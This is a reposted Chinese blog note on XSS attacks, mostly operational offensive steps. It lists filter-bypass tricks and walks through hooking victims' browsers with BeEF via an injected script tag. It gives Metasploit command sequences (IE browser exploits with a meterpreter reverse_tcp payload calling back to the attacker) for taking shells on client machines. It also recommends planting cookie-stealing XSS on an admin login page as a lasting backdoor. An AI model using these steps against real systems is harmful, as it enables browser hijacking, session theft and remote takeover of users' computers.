网络安全-XSS笔记
XSS繞過限制:
1、繞過magic_quotes_gpc
可使用javascript中的String.fromCharCode()
<script>String.fromCharCode()</scrip>
2、HEX編碼
十六進(jìn)制編碼
https://textmechanic.com/ASCII-Hex-Unicode-Base64-Convertor.html
https://www.asciitohex.com/
3、改變大小寫
4、關(guān)閉標(biāo)簽
5、AWVS 掃描
Kali Linux Beef劫持客戶端瀏覽器:
cd /usr/share/beef-xss 進(jìn)入目錄
ls 查看目錄
./beef 運(yùn)行beef
UI URL:管理 網(wǎng)址瀏覽器打開 賬號密碼默認(rèn)beef
Hook URL: 惡意代碼
使用:
<script src="Hook URL"></script>
管理端 Commands Redirect Browser
beef+msf拿客戶端shell (ie6 xp)
cd /usr/share/beef-xss 進(jìn)入目錄
./ beef 運(yùn)行beef
msfconsole 運(yùn)行msf
msf下執(zhí)行:
use windows/browser/ms10_002_aurora
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set SRVHOST 客戶端將要訪問的IP
set SRVPORT 將要訪問的端口
set URIPATH / 網(wǎng)站根目錄
set LHOST 客戶端回連IP
set LPORT 客戶端回連端口
exploit
Using URL 為要讓客戶端訪問的url,beef里設(shè)置
session -i 查看得到的shell
session -1 id 查看固定id的shell
shell 拿到權(quán)限
beef+msf拿客戶端shell (ie7、8、9)
msf下
use exploit/windows/browser/ie_execcommand_uad
show options
set SRVHOST 回連ip
set SRVPORT 回連端口
set URIPATH /
exploit
XSS漏洞掃描工具
WVS
椰樹
safe3
Xelenium
w3af
vega
xss掃描插件+burp
長期留后門,可將XSS獲取cookie代碼留在管理登錄頁面
Xss平臺搭建
使用工具:
wamp2.2+xss.me源碼
轉(zhuǎn)載于:https://blog.51cto.com/3945465/2140843
總結(jié)
以上是生活随笔為你收集整理的网络安全-XSS笔记的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 一个很简短的 JS 生成器入门和用法参考
- 下一篇: 正则匹配路由